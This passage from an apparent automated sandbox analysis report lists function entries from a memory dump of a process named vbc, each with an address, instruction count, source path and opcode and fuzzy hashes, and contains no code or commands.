                                                                • Opcode Fuzzy Hash: bb5ad6e1144f7ce486b1163dfa3bc2551574c06fcb5d6f0cc68b14b1facac039
                                                                • Instruction Fuzzy Hash: EDF06733916AE0DEDF32CA6C8458F22F7D5BB01AA0F08896AD48AC7501C7B4D880C660
                                                                Function 05690115 Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f37f762d003a7b837bb9c1fa02e186ddc69151abe65264f9b417dab6cf3fbbf0
                                                                • Instruction ID: ea99af82d4e25094c975ababfc9332af385dbdc92e16982b0eb981f06da192a2
                                                                • Opcode Fuzzy Hash: f37f762d003a7b837bb9c1fa02e186ddc69151abe65264f9b417dab6cf3fbbf0
                                                                • Instruction Fuzzy Hash: CDF027765296841ACF256B2CE49D6F17F7AA741124F092489D4A1AF700CA748483C368
                                                                Function 0560C5ED Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72a86b4d178abd1136e8007741aaa551b206be039e306780d26cbc21ae4d9020
                                                                • Instruction ID: 97dab3542d0390fd3312c440d741cf328bc735adb47b1ee913867a3a47dad081
                                                                • Opcode Fuzzy Hash: 72a86b4d178abd1136e8007741aaa551b206be039e306780d26cbc21ae4d9020
                                                                • Instruction Fuzzy Hash: D0F0BE72936A509BE73AD658C148B23F3E5BB416A1F08B625D806C7A92C660CCC1CA50
                                                                Function 05612619 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                • Instruction ID: cd334e6113cabcbd9b031102d9cedc820515638d2ad0d7344d455c7c70046f1a
                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                • Instruction Fuzzy Hash: 59E0D8323006406BD7219E6A8CD4F67776EEFC2B10F08007DB9045F292C9E2DC09C6A8
                                                                Function 0560CF80 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                • Instruction ID: ea1411d26dd2d5a4ff083899434a630e42384b9b7474454c25141a674422907b
                                                                • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                • Instruction Fuzzy Hash: BAF0827230410AEFDB119B5AE844E9EFB6AFFC1750F144016E9044B350DB71AC62CB51
                                                                Function 05666030 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                • Instruction ID: a81d866b9b0d650218c56e8e1d65aad32c97412cdb2855fd64201841e36619e2
                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                • Instruction Fuzzy Hash: ADF06572104204EFE3208F16EA44F62BBE9FB45364F55C075E6099B660D379EC40CBA4
                                                                Function 055D0710 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction ID: 66d0ff87e4e339001ca74e66df54a5da441976c8a9113239ab644d8557da01fb
                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction Fuzzy Hash: 4FF0E53A3047549BDB29DF19C048AB5BBA9FB41350F000494EC568F360E731ED81CF94
                                                                Function 055CEC20 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                • Instruction ID: e3382d8bac3338ec37a1c8d9cd7071fa5c55ed93fc4dc12334686d7544bfaef1
                                                                • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                • Instruction Fuzzy Hash: DFF08C31205288AFEF1ACB80C84BF253B9DBB00724F04859DF8088A052CB74D885EB48
                                                                Function 055C8E1D Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                • Instruction ID: 574da5a6c693661f375e086b343cb4b74e2e7cee15bed9deb121a7db6728bd67
                                                                • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                • Instruction Fuzzy Hash: 4DF08C31201A10DFD731AF16CD54B227BA2FF81721F154A5DE05B1B9B0CB24AC42CB88
                                                                Function 0567678E Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction ID: f993847b3869e9406c0677bdacb582e6c05c76afb098e302c43763343b2b5e4b
                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction Fuzzy Hash: 41E0DF32A00514BBDB32A799CD06F9BBAADEB80EA0F050094B602E71D0D530DE04D690
                                                                Function 056A4164 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 069759ba370d9fb3d1ac6508edf56adb2284d574571d894a427aa2220ab028f0
                                                                • Instruction ID: cc3b349e62cd8c523d9315cc5b0a83841258a553f9d82d4f926e758c5c0a995d
                                                                • Opcode Fuzzy Hash: 069759ba370d9fb3d1ac6508edf56adb2284d574571d894a427aa2220ab028f0
                                                                • Instruction Fuzzy Hash: 01F0E5339259914FDB71D724D984F7573E1BF00631F4A0564D415C7E12CBA0DC40CA50
                                                                Function 055D25E0 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 945f7dfe8d16635cefa8a51009a6856d347d00077e07968f406f601395115ac5
                                                                • Instruction ID: 817f86a3d5190089e7017910b003036e3cc8934bd355426ab15b54060da1969f
                                                                • Opcode Fuzzy Hash: 945f7dfe8d16635cefa8a51009a6856d347d00077e07968f406f601395115ac5
                                                                • Instruction Fuzzy Hash: 75E092322106949BC721FB2EDD15F9ABBAAFF90364F114519B11557190CB70A850C798
                                                                Function 0568A456 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                • Instruction ID: a630c9e95d54b21efb789c7491890c8606e2c7a710d64d528c9ae9e54359374c
                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                • Instruction Fuzzy Hash: 60E09231110A51DFDB367F26C94CB62B6E1BF80721F188E2DA09B11AF0C774D8D0CA44
                                                                Function 05654000 Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                • Instruction ID: 7a72fdccda3d0375fb3a4295091c22f05d618048db4ca1bf7e73cb53e7a13a70
                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                • Instruction Fuzzy Hash: 72E0C2343443058FDB15CF19C444B6277B6BFD5A21F28C0A8A8498F709EB32E882CB40
                                                                Function 055C823B Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                • Instruction ID: 41c782b771f47fd812d582fb19ed42f800d8ad13a12d03be3c17faa61fccb8d4
                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                • Instruction Fuzzy Hash: A1E0CD31500910DFD7316F91DD18F617AA2FF84B10F154C6DE0471A5648770AC81DB48
                                                                Function 055C8C8D Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                • Instruction ID: bd5431320d81b72b347703a6d5644bad9eece12dd976fb16d85e869717bc89b3
                                                                • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                • Instruction Fuzzy Hash: 84E08631511A20DED7316F12DD08F627AA2BF40710F154CADE0061A9B08674A885CA89
                                                                Function 055D2050 Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7ff3c187fe5be4302a779741745a5d68a561b6c80831bd9ddb5ae6c60494393
                                                                • Instruction ID: 6b07a7ebb4b11b9c9c1951a1572d1a9aa1ea5d8c7267e032b80a36377ff4aa68
                                                                • Opcode Fuzzy Hash: d7ff3c187fe5be4302a779741745a5d68a561b6c80831bd9ddb5ae6c60494393
                                                                • Instruction Fuzzy Hash: 75E08C33210554ABC721FB5EDD11E5AB79AEFD4260F110121B15597290CA60AC40C7A8
                                                                Function 0560E59C Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction ID: 66903e00fb59ad3aa50b4b09a4b8fb6b497a53bda6537c4285153b641ffa0561
                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                • Instruction Fuzzy Hash: B7D0A932664A20ABD732AA1CFC04FD333E9BB88720F160899B009C7150C360EC81CA84
                                                                Function 055CA0E3 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction ID: 8c4064021e2d11b4f7cbe681bcddcd4a8386651c7b7f695632e1aed53b330dc4
                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                • Instruction Fuzzy Hash: 9AD012327260759BCB299695AD14F676E16BFC1BA4F1A04AD740BA3900C5159C42D6E0
                                                                Function 0560CF50 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 218fe5ecd02a90b221db73387807e4a454bce9fc07f507503c9c92606244033d
                                                                • Instruction ID: 1543ab17213549399424fe5455b948c1df724c1eff2da4e15dcf1ddcda247acf
                                                                • Opcode Fuzzy Hash: 218fe5ecd02a90b221db73387807e4a454bce9fc07f507503c9c92606244033d
                                                                • Instruction Fuzzy Hash: DBD0A732110248ABC711EF0DCD41F157F6AFFD4740F010020B40847221CA31FC60CA58
                                                                Function 055E02A0 Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction ID: 0e11d54bd105fe75fb77ffeeb7e9ae382ed31a354ad7a1888a7c92554bcffa85
                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                • Instruction Fuzzy Hash: AFD0C935616E80CFC71ACB4CC5A8F2573F5BB44B44F854490E442CBB71D66CE940CE00
                                                                Function 0560CF1F Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 109a07686c740c043baf3b0783f529c5c033186f18ff423062cc7384e7849d12
                                                                • Instruction ID: bf6a7287e3f3e90fc2bb662c08b4c80dbb398c487e1e5be8ffcc0760c6274a61
                                                                • Opcode Fuzzy Hash: 109a07686c740c043baf3b0783f529c5c033186f18ff423062cc7384e7849d12
                                                                • Instruction Fuzzy Hash: 77D05E72121440DFE72ACB08CA46F3677A4FB00704F4541B8A00A8BA20C728E800DB44
                                                                Function 0560C700 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction ID: a13517f8853dd91568a839fef26ffb126b6a2b73fe30e6e9958157c0e95cb7df
                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                • Instruction Fuzzy Hash: E2C012322A0648AFC716AA98CD01F027BA9EB98B40F110461F2098B670C631F820EA84
                                                                Function 055F0310 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction ID: 7307095c2bc263eb2ccb743fe40d8688908d1f0471219834297367ecee73adb7
                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                • Instruction Fuzzy Hash: B9D01236240248EFCB01DF45C894D9A772AFBC8710F148019FD1A076518A31ED62DB50
                                                                Function 055D0750 Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction ID: c1c7deb2bac030de9ec131013ff7f7b4a1078857ea1118a22d20211080aca6ab
                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                • Instruction Fuzzy Hash: 06C04C757019458FDF15DB59D394F5577E4F744740F1518D0E805CBB21E624FC01CA10
                                                                Function 05686F00 Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                • Instruction ID: f20e2362c5e3b8d6e1f3e4290781552a822bf1bb696be576352c269eb0d32c09
                                                                • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                • Instruction Fuzzy Hash: E9C09B2F1556C149CD179F3553127F4BF61D7425D4F5D14C5D4D11F712C1148513D625
                                                                Function 056A4DAD Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                • Instruction ID: 9c92b169248372544170e7337c937b13aef489aa1dc8fafc716fbf9f8a152e23
                                                                • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                • Instruction Fuzzy Hash: D3B01232312545CFC7026760CF04B1C36A9BF417C0F0940F0660089830D6188910E601
                                                                Function 05614650 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b05afd2c1423b019e7df860b22f9f6ead823fa265e714eac83a7b76ab12f016c
                                                                • Instruction ID: dbe39d65b42cfc04635c05938b01752050788f65e0ed74b10f558b0a8e8a262f
                                                                • Opcode Fuzzy Hash: b05afd2c1423b019e7df860b22f9f6ead823fa265e714eac83a7b76ab12f016c
                                                                • Instruction Fuzzy Hash: E9900262601A1042414075584C45406601597E13013D5C115A0554764D8E188955D669
                                                                Function 05614340 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b131394cc7290c116aea4b784e28b04648b147a6b2154764d32173d45c0ed55
                                                                • Instruction ID: 343d2543f78e90bf02ba7c8b0b811fe3b0230f9c79d40720ffdc5a197ae60371
                                                                • Opcode Fuzzy Hash: 0b131394cc7290c116aea4b784e28b04648b147a6b2154764d32173d45c0ed55
                                                                • Instruction Fuzzy Hash: E1900232605D1012914075584CC5546401597E0301B95C011E0424758D8E148A569761
                                                                Function 05612D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
                                                                • Instruction ID: 4aff3bfa65f7d461aafec5dbbc53c77b9067847115ffbe3214fc39644375951d
                                                                • Opcode Fuzzy Hash: fea6642171ff10357914cc9d56ad6f5586883a4bbb5e04e3f1ba069e8843f761
                                                                • Instruction Fuzzy Hash: 7090022230191003D140755858596064015D7E1301F95D011E0414758DDD1589569622
                                                                Function 05612D00 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26c9bd212407af2499b3307c26b5c3240aad65990f7c362d4b08f9e45727325c
                                                                • Instruction ID: 443ae63503d6bdfbe3edb0c4f2e676578d927b56084383f45a9b40be2070f40e
                                                                • Opcode Fuzzy Hash: 26c9bd212407af2499b3307c26b5c3240aad65990f7c362d4b08f9e45727325c
                                                                • Instruction Fuzzy Hash: 2390022220595442D10079585849A06001587D0205F95D011A1064799ECE358951E531
                                                                Function 05612D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
                                                                • Instruction ID: eb87f1749cceb672a33db9a22042a3fa65ca5b1f630e4307a94a4b6eb9525310
                                                                • Opcode Fuzzy Hash: 68e70395e0d80961869b43080568b24ff2bce887255d073f47e4094d5ee830ea
                                                                • Instruction Fuzzy Hash: FF90022A21391002D1807558584960A001587D1202FD5D415A001575CDCD1589699721
                                                                Function 05612DD0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
                                                                • Instruction ID: bd169d920dd447858d0a510398d34fb190ede29e5b8b5bf36533c16dc135c1f9
                                                                • Opcode Fuzzy Hash: 992f3a3f7f7518b462d374789791b367da2b27a302131774b391f5d10873f2ee
                                                                • Instruction Fuzzy Hash: 15900222242951525545B5584845507401697E02417D5C012A1414B54D8D269956DA21
                                                                Function 05612DB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
